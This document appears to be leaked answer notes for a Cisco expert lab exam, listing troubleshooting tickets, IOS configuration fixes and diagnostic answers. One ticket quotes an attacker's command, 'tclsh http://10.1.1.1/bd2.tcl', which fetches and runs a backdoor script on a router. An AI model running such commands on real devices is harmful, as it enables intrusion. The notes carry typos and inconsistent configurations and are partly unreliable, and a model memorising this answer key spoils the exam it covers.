TS1 TS2 and DIAG

Question/ Troubleshooting Steps
Ticket
A. PC101 must get an IP Address
3 MAC addresses must match
DHCP, Ports Security, PC itself
B. check OSPF between SW1 and SW2

VLAN database, allowed in the trunk
OSPF neighbors
C. Check the access List BT5
Q1: Layer 2
A. R17 must show 'LCP Open", PPP authentication is no problem

show int s4/0, if "LCP is closing" or "LCP is Requeting" PPP auth
is failing
B. R17 can get an IP address and can get a default route

check the DHCP pool name and configuration
C. Ensure that R11 can ping R17
Q2: PPP
Q2: PPP
D. check if VTY has a problem
R11 can telnet to R17, via R12
A. Check the OSPF neighbors
B. Check the route mask - it should be /29
C. Check the load balancing
R1 > 123.45.65.48/29 must be load balance

R1>R3|R5>R21|R22
Q3: OSPF
A. Check the EIGRP k-Values, 1 1 1 1 1
B. Check the EIGRP Neighbor

k-Values and passive interfaces
C. Check distibute list on R13 and R14
D. Check the Off-set list on R12

Q4: EIGRP
Q4: EIGRP
R11 > R14 loopback
R11> R12|R13 > R14
A. Check the BGP neighbors
B. Check the metics on R4 and R6
C. Check R21 and R22 on the metric or local preference
D. Check the LDP neighbor
Note: if you find that there is no problem on routing, but

you cannot run the traceroute, then LDP has an issue
R12>R3 (loopback)
R12>R4>R2>R1>R3
R12>R21 (loopback)
Q5: BGP R12>R6>R2>R1>R3>R21
R12>8.8.8.8 (traceroute 8.8.8.8 probe 2)
R12>R4|R6>R2>R1>R3>R21>R26
R12>192.1.1.1 (traceroute 194.1.1.1 probe 2)
R12>R4|R6>R2>R1>R5>R22>R26
A. Check the BGP neighbor
B. Check the next-hop
C. Check network statements in R25

sh bgp ipv6 unicast summ
Q6: IPv6
Phone > Server4
A. Check DMVPN on R15
R15 is the hub

R17,R18,19 are the spokes
R19 and R20 are EIGRP neighbors
Server2 > PC107 (behing R17)

PCs to Server 2
PC to PC
Q7: DMVPN
A. Check BGP neighbor
B. Check VRF RT
C. Make sure default route can be sent to AS 65101 and 65102
D. Make sure routes of AS65101 and 65102 can be sent to

R7 and R8
E. check the NAT and default route next hop
F. check netwoek statement

network 125.45.67.20 mask 255.255.255.252
G. check the backup path
BancoBank_ToHub
BancoBank_ToSpoke
R7 and R18 are configured as backbone for VPN Network

R9/PC104, R10/PC106 are VPN Clients
PC106 > trace 8.8.8.8

PC106>SW4>R10>R6>R2>R1>R3>R7>R3>R21>R26
PC104>PC106
PC104>SW3>R9>R5>R1>R3>R7>R3>R1>R2>R6>R10>SW4>PC106
Q8: MPLS VPN

A. R24 can ping 125.45.67.22
B. Check the IPSEC VPN
C. Check OSPF neighbor
PC110 can access the Server 1

Q9: DMVPN
NAT
A. NAS can get an IP Address
B. Check the NAT on R23
R21 must be able to telnet to NAS

Q10: NAT
BT1
SW2
vlan 12
int e0/0
sw tr al vl add 12
int e1/0
sw ac vl 100
int vlan 100
ip add 172.16.100.1 255.255.255.0
PC101
int e1/0
shut
no shut
R17
int s4/0
ppp chap hostname UberMarket_spoke_R17
ppp ipcp route default
no ppp auth chap callout
R12
ip local pool SPOKE1 145.67.89.22
R3
router ospf 12345
no area 1 range 134.56.78.0 255.255.255.0
R5
router ospf 12345
no max-metric router-lsa
R21
int e2/0
no ip opsf cost 1
R13
router eigrp 145
metric weights 0 1 1 1 1 1
ip access-list standard 10
no 10
int e1/0
no delay 1000
R14
no ip prefix-list DENY seq 5 deny 145.14.14.14/32
R12
5 deny 145.14.14.14
int e1/0
no bandwidth 1000
1x300 2x50
R21
ip prefix-list 194 seq 10 permit 194.1.0.0/16 le 32
route-map MED permit 10
match ip address prefix-list 194
set metric 300
clear ip bgp * soft
R22
router bgp 12345
address-family ipv4
neighbor PEER next-hop-self
clear ip bgp * soft
R12
router bgp 12345
maximum-paths 2
R6
set metric 50
clear ip bgp * soft
R4
set metric 50
clear ip bgp * soft
R25
router bgp 65101
address-family ipv6
network 2001:CC1E:BEEF:25::/64
route-map NEXT-HOP permit 10
no set ipv6 next-hop 2001:3::3
set ipv6 next-hop 2001:CC1E:BEEF:2225::18
clear ip bgp * soft
R22
router bgp 12345
address-family ipv6
neighbor 123.1.2.18 route-map NEXT-HOP out
clear ip bgp * soft
R15
int tun0
ip nhrp redirect
no ip split-horizon eigrp 200
router eigrp 200
no redistribute connected metric 1 1 1 1 1
R18
int tun0
ip nhrp map multicast 145.67.89.10
ip nhrp nhs 215.0.0.1

ip nhrp shortcut
R19
int tun0
no ip nhrp auth uSER789
ip nhrp auth USER789
ip nhrp shortcut
router eigrp 200
no eigrp stub connected summary
ip access-list extended DMVPN
permit esp any any
R20
router eigrp 200
no passive-interface e0/0
passive-interface e1/0
R7
router bgp 65100
neighbor 123.45.67.21 default-originate
! Missing at preconfig
redistribute static metric 1
no ip nat source list 100 int e0/0.125 overload
ip nat inside source list 100 int e0/0.125 overload
R8
router bgp 65100
! Missing at preconfig
redistribute static metric 1
R3
ip vrf BancoBank_ToHub
route-target import 65100:102
router bgp 12345
address-family ipv4
network 125.45.67.20 mask 255.255.255.252
R9
router ospf 65101
default-information originate
R7
no crypto isakmp key CCIE address 192.168.1.2
crypto isakmp key CCIE address 0.0.0.0
int tun10
shut / no shut
R24
crypto ipsec nat-transparency udp-encapsulation
no crypto transform-set CCIEXFORM esp-3des esp-md5-hmac
crypto transform-set CCIEXFORM esp-aes
mode transport
int tun10
shut / no shut
R23
ip dns server
no access-list 194 permit ip host 192.168.1.0 any
access-list 194 permit ip 192.168.1.0 0.0.0.255 any
no ip nat outside source static tcp 192.168.1.200 80 134.56.78.10 8008 extendable
ip nat inside source static tcp 192.168.1.200 80 134.56.78.10 8008 extendable
R24
int e0/0
no ip add 192.168.1.200 255.255.255.0 secondary
NAS
ip domain lookup
BT2
SW2
int e1/0
sw ac vl 100
shut
no switchport port-security mac-address aabb.cc00.2155
switchport port-security mac-address aabb.cc00.2111
no shut
router ospf 65100
no passive-interface vlan12
R12
int s4/0
no peer default ip address pool SPOKE11
peer default ip address pool SPOKE1
shut / noshut
R5
router ospf 12345
R22
int e2/0
ip add 134.56.78.49 255.255.255.248
router ospf 12345
R13
router eigrp 145
R14
R12
5 deny 145.14.14.14
1x50
R21
router bgp 12345
network 134.21.21.21 mask 255.255.255.255
R5
router bgp 12345
address-family ipv4
neighbor 123.4.4.4 act
R4
set metric 50
clear ip bgp * soft
R25
router bgp 65101
address-family ipv6
no network 2001:CC1E:BEEF:25::1/128
network 2001:CC1E:BEEF:25::/64
R22
route-map NEXTHOP permit 10
no set ipv6 next-hop 2001:CC2E:BEEF:2225::17
R15
int tun0
ip nhrp redirect
no ip host user1spoke2 145.67.89.30
ip host user1spoke2 145.18.18.18
R18
int tun0
R19
permit esp any any
R7
router bgp 65100
no ip route 0.0.0.0 0.0.0.0 124.45.67.21
ip route 0.0.0.0 0.0.0.0 125.45.67.21
int e0/0.125
ip nat outside
R8
router bgp 65100
no neighbor 124.45.67.25 shut
int e0/0.123
ip nat inside
R3
router bgp 12345
address-family ipv4
network 125.45.67.20 mask 255.255.255.252
R4
int e2/0
ip ospf cost 1000
R6
ip vrf BancBank
int e2/0
ip ospf cost 1000
R7
no crypto isakmp key CCIE address 192.168.1.2
crypto isakmp policy 10
group 14
int tun10
shut / no shut
R24
crypto isakmp nat-transparency udp-encapsulation
router ospf 65100
network 172.247.247.0 0.0.0.3 area 3
int tun10
shut / no shut
R23
no ip nat outside source static tcp 192.168.1.200 80 134.56.78.10 8008 extendable
ip dhcp pool NAS
no client-identifier aabb.cc00.0000
client-identifier 01aa.bbcc.0000.00
ip name-server 8.8.8.8
R24
int e0/0
R21
ip domain lookup
NAS
ip http server
BT3
SW2
int vlan100
ip add 172.16.100.1 255.255.255.0
ip helper-address 172.8.8.8
int e1/0
shut / no shut
vlan 12
SW1
router ospf 65100
R8
ip dhcp pool HOST1
default-router 172.16.100.1
PC101
int e0/0
mac-address aabb.cc00.2111
shut / no shut
R17
int s4/0
ppp chap password ccie
shut / no shut
line vty 0 4
transport input telnet
R12
no ip local pool SPOKE1 145.67.89.222
ip local pool SPOKE1 145.67.89.22
int s4/0
shut / no shut
R3
int e2/0
no ip ospf hello-interval 11
router ospf 12345
no area 1 range 134.56.78.0 255.255.255.0
R1
int e1/0
no ip ospf cost 1
R21
router ospf 12345
R22
int e0/0
no ip ospf network point-to-point
int e2/0
ip add 134.56.78.49 255.255.255.248
R13
int e0/0
ip add 145.67.89.6 255.255.255.252
R14
router eigrp 145
R12
5 deny 145.14.14.14
R11
int eth1/0
no ip auth mode eigrp 145 md5
2x50
R21
clear ip bgp * soft
router bgp 12345
R22
router bgp 12345
neighbor PEER update-source l0
R5
router bgp 12345
address-family ipv4
R12
router bgp 14567
maximum-paths 2
R2
int e1/0
mpls ip
int e2/0
mpls ip
R6
set metric 50
clear ip bgp * soft
R4
set metric 50
clear ip bgp * soft
R25
router bgp 65101
address-family ipv6
R22
router bgp 12345
address-family ipv6
clear ip bgp * soft
R15
router eigrp 200
int tun0
ip nhrp redirect
R17
int tun0
tunnel protection ipsec profile DMVPNPROFILE
R19
router eigrp 200
no eigrp stub connected summary
permit esp any any
int tun0
R20
router eigrp 200
no passive-interface default
network 145.67.89.81 0.0.0.0
R7
router bgp 65100
neighbor 124.45.67.21 remote-as 12345
int e0/0.125
ip nat outside
no ip nat outside source list 100 interface e0/0.125 overload
ip nat inside source list 100 interface e0/0.125 overload
int e0/0.123
ip nat inside
R8
access-list 100 permit ip 172.16.201.0 0.0.0.255 any
int e0/0.125
ip nat outside
router bgp 65100
R3
router bgp 12345
address-family vpnv4
R4
int e2/0
ip ospf cost 1000
R6
int e2/0
ip ospf cost 1000
R9
router ospf 65101
R5
int s4/0
ip vrf forwarding BancoBank
ip add 123.65.1.29 255.255.255.252
R7
int tun10
shut / no shut
R24
no crypto isakmp key CC1E address 0.0.0.0
router ospf 65100
no passive-interface tun10
int tun10
shut / no shut
R21 (related to Q10)

int s4/0
ip add 134.56.78.9 255.255.255.252
R23
no ip nat source static tcp 192.168.1.200 80 134.56.78.10 8008 extendable
ip nat inside source static tcp 192.168.1.200 80 int s4/0 8008
ip dns server
R21
ip domain lookup
int s4/0
ip add 134.56.78.9 255.255.255.252
NAS
int e0/0
ip add dhcp client-id e0/0
BT4
SW2
int e0/0
sw tr al vl add 12
int vlan 100
ip helper-add 172.8.8.8
R8
no ip host SERVER1 172.16.200.1
ip host SERVER 172.16.200.200
ip dhcp pool HOST1
client-identifier 01aa.bbcc0021.11
R17
int s4/0
ppp chap password CCIE
no 10
R12
int s4/0
peer default ip address pool SPOKE1
shut / no shut
R3
router ospf 12345
network 134.56.78.37 0.0.0.0 area 1
int eth0/0
R22
router ospf 12345
no network 134.56.78.41 0.0.0.0 area 1
network 134.56.78.42 0.0.0.0 area 1
int eth2/0
no ip ospf cost 1
R13
router eigrp 145
R14
router eigrp 145
no passive-interface default
1x50
R21
router bgp 12345
no neighbor PEER route-map LP in
neighbor PEER route-map LP out
R22
router bgp 12345
address-family ipv4
R3
ip access-list extended 100
no 10
router bgp 12345
no neighbor 123.6.6.6 password cisco
no neighbor 123.4.4.4 shutdown
R12
router bgp 14567
maximum-paths 2
R4
set metric 50
clear ip bgp * soft
R22
router bgp 12345
address-family ipv6
no 20
R15
int tun0
ip nhrp redirect
no ip host user1SPOKE 145.18.18.18
R18
router eigrp 200
no eigrp stub receive-only
R19
permit esp any any
int tun0
no tunnel source e0/0
tunnel source s4/0
R20
int e0/1
ip add 200.100.0.81 255.255.255.252
PC109
no ip domain timeout 1000
R7
int e0/0.124
no ip nat outside
ip nat inside
int e0/0.125
no ip nat inside
ip nat outisde
router bgp 65100
no ip route 0.0.0.0 0.0.0.0 124.45.67.21
ip route 0.0.0.0 0.0.0.0 125.45.67.21
R3
router bgp 12345
no neighbor 123.4.4.4 shutdown
R4
R7
int tun10
tunnel source e0/0.125
R24
int tun10
tunnel protection ipsec profile DMVPNPROFILE
router ospf 65100
no network 172.247.247.4 0.0.0.3 area 3
network 172.247.247.0 0.0.0.3 area 3
R21
int s4/0
no peer default ip address pool R21
peer default ip address pool R23
shut / no shut
R23
ip dhcp pool NAS
R24
int e0/0
NAS
int e0/0
shut / no shut
BT5
SW2
no 10
access-list 100 deny ip any host 172.16.100.200
access-list 100 permit ip any any
int vlan 100
ip access-group 100 out
SW1
router ospf 65100
network 172.16.200.0 0.0.0.255 area0
no 20
20 permit 17.16.200.0 0.0.0.255
access-list 10 permit 0.0.0.0
access-list 10 permit 172.16.200.0
int vlan200
ip access-group 10 in
R17
int s4/0
encapsulation ppp
R12
no ip prefix-list DENY seq 5 deny 145.67.89.20/30 le 32
clear ip eigrp neighbors
R3
no 10
access-list 100 deny ospf any any
int e2/0
R21
router ospf 12345
router-id 134.21.21.21
clear ip ospf process [yes]
R22
router ospf 12345
router-id 134.22.22.22
R13
router eigrp 145
R14
router eigrp 145
R12
router eigrp 145
1x10
R21
router bgp 12345
no neighbor 134.67.78.6 route-map LP out
neighbor 134.56.78.6 route-map LP in
clear ip bgp * soft
R5
no set ip next-hop 123.45.67.45
clear ip bgp * soft
R2
int e0/0
mpls ip
R6
ip prefix-list DENY seq 3 permit 134.21.21.21/32
clear ip bgp * soft
R4
set metric 10
clear ip bgp * soft
R22
5 permit tcp any any eq 179
[10 deny tcp any any]
int s4/0
ip access-group 100 out
R15
int tun0
ip nhrp redirect
R17
int tun0
ip nhrp shortcut
R18
int tun0
ip nhrp shortcut
R19
int tun0
ip nhrp shortcut
R14
access-list 100 permit esp any any
PC109
ip domain lookup
R7
router bgp 65100
R8
int eth0/0.124
ip nat inside
R4
int e2/0
ip ospf cost 1000
R6
router bgp 12345
address-family vpnv4
int e2/0
ip ospf cost 1000
R9
ip dhcp pool PC104
router bgp 65101
redistribute ospf 65101 match internal external 1 external 2
SW3
router ospf 65101
network 172.16.101.9 0.0.0.0 area 0
PC104
int e0/0
ip address dhcp client-id e0/0
R21
R23
ip dhcp pool NAS
client-identifier 01aa.bbcc.0030.00
ip domain lookup
NAS
int e0/0
ip add dhcp client-id e0/0
Test1
SW1
router ospf 65100
network 172.16.200.0 0.0.0.255 area 0
no 20 [permit 172.16.200.0]
20 permit 172.16.200.0 0.0.0.255
R17
int s4/0
encapsulation ppp
R21
router ospf 12345
router-id 134.21.21.21
R13
router eigrp 145
R12
router eigrp 145
1x10
R2
int e0/0
mpls ip
R5
no set ip next-hop 123.45.67.45
clear ip bgp * soft
R6
clear ip bgp * soft
R4
set metric 10
clear ip bgp * soft
R22
5 permit tcp any any eq 179
[10 deny tcp any any]
R15
int tun0
ip nhrp redirect
R19
int tun0
ip nhrp shortcut
R14
access-list 100 permit esp any any
PC109
ip domain lookup
R7
router bgp 65100
R4
int e2/0
ip ospf cost 1000
R6
int e2/0
ip ospf cost 1000
R9
ip dhcp pool PC104
SW3
router ospf 65101
network 172.16.101.9 0.0.0.0 area 0
PC104
int e0/0
R21
R23
ip dhcp pool NAS
client-identifier 01aa.bcc.0030.00
ip domain lookup
NAS
int e0/0
Test2
SW2
int vlan100
ip add 172.16.100.1 255.255.255.0
R17
int s4/0
encapsulation ppp
R12
int s4/0
no peer default ip address pool user1spoke1
peer default ip address dhcp-pool user1spoke1
R3
router ospf 12345
R12
router eigrp 145
R1
int e0/0
R5
router bgp 12345
address-family ipv4
neighbor IBGP route-reflector-client
R22
router bgp 12345
addres-family ipv6
neighbor 2001:CC1E:BEEF:2225::18 act
R15
int tun0
ip nhrp redirect
R18
int tun0
R3
int e1/0.123
ip vrf forwarding BancoBank_ToSpoke
ip add 123.45.67.21 255.255.255.252
R4
int e2/0
ip ospf cost 1000
R6
int e2/0
ip ospf cost 1000
R9
router ospf 65101
R24
int tun10
no ip ospf network broadcast
R23
V1
SW2
vlan 12
int e1/0
sw ac vl 100
router ospf 65100
R17
int s4/0
no ppp authentication chap callout
R12
router bgp 14567
network 145.6.89.20 mask 255.255.255.252
R5
router ospf 12345
R21
int e2/0
no ip ospf cost 1
R13
int e1/0
no delay 1000
R12
int e1/0
no bandwidth 1000
1x100
R21
ip prefix-list 194 permit 194.1.1.0/24
router bgp 12345
no neighbor 134.56.78.6 route-map MED out
neighbor 134.56.78.6 route-map MED in
clear ip bgp * soft
R12
router bgp 14567
maximum-paths 2
R6
set metric 100
clear ip bgp * soft
R25
clear ip bgp * soft
R22
clear ip bgp * soft
R15
router eigrp 200
int tun0
ip nhrp redirect
no ip split-horizon eigrp 200
R18
int tun0
ip nhrp shortcut
no ip nhrp map 145.67.89.10 215.0.0.1
ip nhrp map 215.0.0.1 145.67.89.10
R19
int tun0
ip nhrp shortcut
no ip nhrp map 145.67.89.10 215.0.0.1
ip nhrp map 215.0.0.1 145.67.89.10
R7
router bgp 65100
no ip nat source list 100 int e0/0.125 overload
ip nat inside source list 100 e0/0.125 overload
R8
router bgp 65100
R3
router bgp 12345
address-family ipv4
network 125.45.67.20 mask 255.255.255.252
R4
R9
router ospf 65101
R10
router ospf 65102
R7
crypto isakmp policy 10
group 14
router ospf 65100
network 172.247.247.1 0.0.0.0 area 3
R24
R23
no ip nat source static tcp 192.168.1.200 23 interface s4/0 2323
ip nat inside source static tcp 192.168.1.200 23 int s4/0 2323
NAS
int e0/0
shut / no shut
R6#sh run | s vrf R5#sh run | s vrf
ip vrf BancBank ip vrf BancBank
rd 65100:102 rd 65100:101
route-target export 65100:102 route-target export 65100:101
route-target import 65100:100 route-target import 65100:100
R4#sh run | s vrf R3#sh run | s vrf

ip vrf BancoBank_ToHub ip vrf BancoBank_ToHub
rd 65100:103 rd 65100:103
ip vrf BancoBank_ToSpoke ip vrf BancoBank_ToSpoke
rd 65100:100 rd 65100:100
route-target export 65100:100 route-target export 65100:100
Question/Ticket Troubleshooting Steps
A. Check VLAN Access Map
B. Check HSRP
C. Check OSPF, the 4x IP Addresses
Q1: Layer 1
User4 (VLAN2000) to R40 Lo0 in Large Office
A. Check the BGP neighbor, sh ip bgp
B.Check SW111 route, and to VLAN 2001
C. On R15, configure next-hop-s
Server 1 needs to ping 8.8.8.8

Q2: BGP
A. Check the BGP neighbor
B. Check the MED and Access-list
C. OSPF Load Balance

use - sh ip ospf interface, sh ip route ospf
VLANs between DC1 and DC2 need to be load balanced
Q3: BGP2
note:
Access list 1 - for odd
Access list 2 - for even
Origin IGP is preferred over Origin Incomplete
A. Check local pref
Q4: BGP2
A. Check BGP Neighbor, DMVPN config
B.Check OSPF Configuration
R14 is the hub, R14 and R51 are the Spokes
Q5: DMVPN
A. Check default route on SW111

OE2 ::/0 [110/1], tag 65001
Q6: IPv6
B. Check OSPFv3 on SW111
Q6: IPv6
C. Check R15 can send the segmet VLAN2001
User1 should ping ISP IPv6 address
A. Check OSPF neighbor

LDP should be up
B. Check BGP VPNV4 neigh
C. Check the RT (route target)

Q7: MPLS
D. Check LDP neigh
A. Check SW300/301
B. Check VLAN 2000

ip dhcp relay information trusted
Q8: Security
A. Check the tunnel source, DMVPN config
Q9: DMVPN
Q9: DMVPN
A. Check NAT (compare R24 and R25)
Q10: NAT
BT2
SW400
no 10
no 30
router ospf 65004
SW401
no 10
no 30
R40
ip dhcp pool xx
lease 0 2 1
R41
ip dhcp pool xx
lease 0 2 1
SW110
int e2/0
no ip ospf cost 100
SW111
int e2/0
no ip ospf cost 100
R12
clear ip bgp * soft
R22
match ip address 2
set metric 1
set origin igp
clear ip bgp * soft
R23
match ip address 2
set metric 1
set origin incomplete
clear ip bgp * soft
int l0
no ip ospf 10 area 0
ip ospf 1 area 0
R20
router bgp 65002
neighbor DC2 route-map LP out
clear ip bgp * soft
R21
router bgp 65002
neighbor DC2 route-map LP out
clear ip bgp * soft
R60
int tun0
ip add 10.100.0.60 255.255.255.0
R15
router bgp 65001
address-family ipv6
network 2001:CC:1E:8BAD:2001::/104
SW111
int vlan2001
ospfv3 65001 ipv6 area 0
R5
int e0/1
no ip ospf 10 area 0
ip ospf 1 area 0
R10
router ospf 65001
distance ospf external 210
SW300/SW301
int vlan2000
SW300
router ospf 65003
SW310
ip dhcp snooping information option
port-channel2
ip arp inspection validate
port-channel1
ip arp inspection validate
ip dhcp pool xx
lease 0 2 1
User3
int e0/0
shut / no shut
R71
int tun0
ip ospf network point-to-point
R24/25
ip nat outside source static 201.99.70.2 201.99.25.70
3.1
SW400
vlan access-map ATTACK 20
action forward
SW401
vlan access-map ATTACK 20
action forward
User4
int e0/0
shut / no shut
SW111
int vlan2001
ip ospf 65001 area 0
R14
router bgp 65001
neighbor DC1 next-hop-self
clear ip bgp * soft
SW101
int e1/2
no ip ospf cost 1
R12
no access-list 1 permit 10.2.1.0 0.0.254.255
access-list 1 permit 10.1.1.0 0.0.254.255
clear ip bgp * soft
R13
clear ip bgp * soft
R21
route-map LP permit 10
match ip address prefix-list LP
set local-preference 200
clear ip bgp * soft
R14
int tun0
ip ospf network point-to-multipoint
R51
int tun0
R60
int tun0
R15
router bgp 65001
address-family ipv6
network 2001:CC:1E:8BAD:2001::/104
R5
ip vrf GLOBALISP
no route-target export 65005:5
route-target export 65003:3
R1
int lo0
ip ospf 10000 area 0
R3
int e0/1
mpls ip
SW300/SW301
int vlan 2000
User3
int e0/0
shut / no shut
R71
int tun0
tunnel key 10000
R25
no ip nat inside source static tcp 201.99.25.2 23 10.2.200.1 23
ip nat inside source static tcp 10.2.200.1 23 201.99.25.2 23
ip nat outside source static 201.99.70.2 200.8.8.8
(copy from R24 it is correct)
Tickets H1 Diag
DIAGs comes with a set. They don’t come with mixed questionnaires
Ticket 1
Question 1 the material provided in which one of best to help you determine fault?
Device SW3; Command line: show ip int brief
Question 2 Indicate which information collected on which device you require from the helpdesk in
order to confirm your suspicien
Collect on device: Host_1
Required information:what's the mac address of E0/0
Ticket 2
Question 1 after considering all information provided. Point and click on the device that is
responsible for causing the report sympton.
R15
Question 2 Recommend a possible solution to this issue as well as on which device it must be
configured:
Exclude the ip prefix of E0/0 into EIGRP
Ticket 3
Question 1 Drag and Drop

1. R1 looks up its RIB and select int e2/0 as the egress interface
2. R1 translates the source IP Address to its interface Lo11
3. R1 transmits the packet via interface e2/0
4. Packets are received by R3 and forwarded to the destination
5. The destination replies with an ICMP echo reply
6. The echo Reply is routed via R2
7. R2 transmits the echo reply to R1
8. Unicast RPF on R1 drops the echo reply
Question 2 After considering all information provided, identify the root cause of the issue:
Asysmmetric routing with Unicast RPF.
H1+ Diag
the material provided in which one of best to help you determine fault?
Device SW3; Command line: show spanning-tree summary
Indicate which information collected on which device you require from the helpdesk in order
to confirm your suspicien
Collect on device: SW3
Required information:show vtp password
after considering all information provided. Point and click on the device that is responsible for
causing the report sympton.
R16
Recommend a possible solution to this issue as well as on which device it must be configured:
Increase the mask Length of R16 interface E0/0
Drag and Drop

1. R1 determines if there is a single path to the destination based on per destination
2. R1 determines R3 as adjacency via F2/0
3. R1 checks its ACL and decides (destination) IP Address needs to be translated.
4. R1 sends the packets via F2/0
5. R3 receives the packet and check its own ACL and determines R2 as destination
6. R2 receives the packet and check with its ACL and determines R1 as destination
7. R2 drops the packet
8. URPF fail
After considering all information provided, identify the root cause of the issue:
strict unicast RPF dropping packets and pre-destination load-balancing
How to differentiate the H3 DIAG and H3+ DIAG
If you find SW3 'show ip interface brief E0/0' is down ,this set is H1 DIAG
If u find SW3 show spanning summary only has vlan 1, this sets is H1+ DIAG
If you find E0/0 of R16 mask length is /30 ,this one is H1 DIAG
If you find E0/0 of R16 mask length is /29 ,this one is H1+ DIAG
You just see the last question answer
H1 DIAG is unicast RPF
H1+ DIAG is strict + pre-destination
Tickets H2 Diag
Ticket 1
Key word for PCAP file | icmpv6.type==134
Question 1 how fast fix the problem

Configure CE2 with highest HSRPV6 priority
Question 2 What is the root cause of the problem caused by the current ? Which device?
Wrong HSRP configuration
CE1
Question 3 choose the first frame id that demonstrate your doubt
active: #193
//RA FE80:666
Ticket 2
Question 1 What is the issue
R3 has no route to RP
Question 2 You will ask what to your engineer ?
why is 10.4.1.0/24 not in R3's RIB.
Question 3 how to deal with current issues temporary ?
R3 (config) ip route 10.4.1.1 255.255.255.255 10.0.0.17
//note: 10.0.0.17 is the address of R4, if u find next-hop is wrong, you can choose
R3(config)#ip mroute 10.4.1.1 255.255.255.255 10.0.0.17
H2+ Diag
how fast fix the problem

Shutdown interface of CE1 E0/0
What is the root cause of the problem caused by the current ? Which device ?
High preference gateway information is sent out
Unknown device in CE's LAN
choose the first frame id that demonstrate your doubt
active: #227
//RA: FE80::666
What is the issue
R2 has no route to RP
You will ask what to your engineer ?
why is 10.4.1.0/24 not in R2's RIB.
how to deal with current issues temporary ?
R2 (config) ip route 10.4.1.1 255.255.255.255 10.0.0.17
//note: 10.0.0.17 is the address of R4, if u find next-hop is wrong, you can choose
R3(config)#ip mroute 10.4.1.1 255.255.255.255 10.0.0.17
if u can find the command line” configure CE2 with highest HSRPv6 priority” It is H2 DIAG
if u can not find the command line” configure CE2 with highest HSRPv6 priority” It is H2+ DIAG
If you find R3 show ip pim rp is 0.0.0.0 ,it is H2 DIAG

If you find R2 show ip pim rp is 0.0.0.0 ,it is H2+ DIAG
Tickets H3 Diag
Ticket 1
Question 1 Which material is most helpful?

Device: SW1 ; Command: show ip dhcp relay information trusted-
resource
Question 2 Which packets can help you find the cause?
Seq: 113, the packets is about DHCP discovery , source ip address is
0.0.0.0
Question 3 where to capture packet on topology?
between SW1-SW3
Ticket 2
Attacker is 10.1.1.2, Server is 10.1.1.1

What does the capture effectively shows ? Select all that apply (9,
Question 1
choose 4)
TCP connection from the router to 10.1.1.2
TCP connection from a remote host to router's IP address 10.1.1.1 on
port 1337
Download of a TCL script in memory via HTTP
Installment of a ransomware via a backdoor
other options (not to be selected)!!!

port 1337
Download of a TCL script in memory via HTTPS
Installment of a backdoor via ransonware
TCP connection from 10.1.1.1 to the router via VTY
Question 2 Which command if issued from the Hacker end can bring down the
complete system?
power off
Question 3 which command is attacker is using ?
tclsh http://10.1.1.1/bd2.tcl
http://10.1.1.1/bd2.tcl
copy http://10.1.1.1/bd2.tcl
H3+ Diag
Problem: Server1 - cannot get an IP Address
traffic_capture_DHCP_SNOOP_0001.pcapng
Option82 is EMPTY (from the Capture)
Which material is most helpful?

Command: show ip dhcp relay information trusted-resource
Which packets can help you find the cause?

0.0.0.0
where to capture packet on topology?
between SW1-SW3
traffic_capture_TCL_SCRIPTING_0001.pcapng

What does the capture effectively shows ? Select all that apply (8,
choose 4)
port 1337

port 1337
Which command if issued from the Hacker end can bring down the
complete system?
power off
which command is attacker is using ?
http://10.1.1.1/bd2.tcl
H3++ Diag
Open the Capture in WireShark

then, filter with 'bootp'
Select the first "DHCP Discover" packet
choose the Option82 inside it
What is the problem that can you get from the packet?
Its source IP Address is 0.0.0.0

Seq: 114, the packets is about DHCP discovery , source ip address
is 0.0.0.0
where to captureing packet on topology?
between SW1-SW3
http.request.method==GET
tcp.stream eq 0-4
png tcp.port==3001

What does the capture effectively shows ? Select all that apply
(8, choose 4)
TCP SESSION from 10.1.1.1 to the router via VTY
TCP connection from a remote host to router's IP address
10.1.1.1 on port 1337

TCP connection from a remote host to router's IP address
10.1.1.2 on port 1337
Which command if issued from the Hacker end can bring down
the complete system?
power off
http://10.1.1.1/bd2.tcl
H3+++ Diag
Option82 - Packet with Value (example only, not in the Capture)
Which material is most helpful?

Device: SW1 ; Command: show ip dhcp relay information trusted-
resource
0.0.0.0
where to capture packet on topology?
between SW1-SW3

What does the capture effectively shows ? Select all that apply (9, choose
4)
TCP connection from a remote host to router's IP address 10.1.1.2 on port
1337

TCP connection from 10.1.1.1 to the router via VTY
TCP connection from a remote host to router's IP address 10.1.1.1 on port
1337
Which command if issued from the Hacker end can bring down the
complete system?
power off
Asked you to choose the device and command line,it is H3 DIAG

Asked you to choose the command line,it is H3+ DIAG. U can check the seq
<< this could be 133
Question 1 have 9 options,it is H3 DIAG

Question 1 have 8 options,it is H3+, H++ DIAG
Section Section Description H1 CONF
VTP SW1/SW2 - VTP server/client
SW3/SW4 - VTP Transparent
1.1
1.2 L2 Ports the same, except for VLAN database
1.3 STP Rapid-PVST
1.4 WAN Switching same
2.1 OSPF in AS12345 same
2.2 EIGRP in 34567 same
EIGRP in 45678 R15/R16?R17 are Named, SW5/SW6 are classic
2.3
2.4 EIGRP in 45678 (remote) same
2.5 BGP in AS12345 same (peer-group is iBGP)
2.6 BGP in 34567 same
2.7 BGP in 45678/65222 AS 20003, use BGP Backdoor
2.8 Routing Policies same, permit 123.0.0.0/8 le 32
2.9 IPv6 OSPF ipv6 router ospf 1
2.10 BGP for IPv6 minor change due to sec 2.9
2.11 L3 Multicast same
3.1 MPLS VPN Part1 same
3.2 MPLS VPN Part2 same
3.3 DMVPN non-VRF aware
3.4 DMVPN Encryption pre-shared
4.1 Device Security same - banner
4.2 Network Security port-security sticky, violation shut
5.1 System Management ssh, ip domain name cisco.com
5.2 Network Services NAT, same
5.3 Network Optimization top talkers
5.4 Network Services NTPv4, no auth
H1+ CONF
SW1/SW2 - VTP Transparent
SW3/SW4 - VTP Server Client
the same, except for VLAN database
MST
same
same, except for R1 max-metric router-lsa
same
R15/R16/R17/SW5/SW6 are all Named
with hmac authentication
same
same (peer-group is iBGP)
same
VRF LOCALSP for AS 20003
same, permit 123.0.0.0/8 le 32
router ospfv3 1
minor change due to sec 2.9
same
same
same
VRF aware
keying pre-share, for VRF
same - banner
port-security sticky
ssh, ip domain name acme.org
NAT, same
shell processing full
NTPv4, wih Authentication
Section Section Description
DC Access port
1.1
1.2 Jameson's DC trunk ports
1.3 Jameson's DC link bundling
1.4 Jameson's DC Branch Offices
2.1 Jameson's IGP Part1
2.2 Jameson's IGP Part2
2.3 Jacob's IGP
Jameson's Pre-merge
2.4
2.5 Jacob's pre-merge
2.6 Merge Phase 1 - BGP
2.7 Merge Phase 2 - IGP
